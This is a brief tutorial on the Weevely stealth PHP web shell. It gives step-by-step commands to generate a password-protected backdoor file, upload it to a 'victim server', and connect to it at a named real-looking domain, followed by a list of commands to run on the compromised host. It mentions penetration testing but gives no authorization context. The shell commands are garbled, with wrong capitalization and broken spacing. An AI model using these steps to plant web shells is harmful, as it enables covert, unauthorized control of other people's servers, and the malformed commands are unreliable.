Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.
Open your backtrack terminal and type cd /pentest/backdoors/web/weevely
Now type ./weevely.py generate <password> <location, where u want to save file> .It will look something like this
. / weevely.py generate rajchandel (Password) /root/Desktop
Then upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password> .It will look something like this
. / weevely http://telecallerjobs.com/webdoor.php rajchandel
Uname –a – print all information
Free – display information about free and used memory on the system
pwd – print name of current/working directory
Df – displays the amount of disk space available on the filesystem containing each file name argument
W – Displays information about the users currently on the machine, and their processes
Ls – List information about the FILEs (the current directory by default)
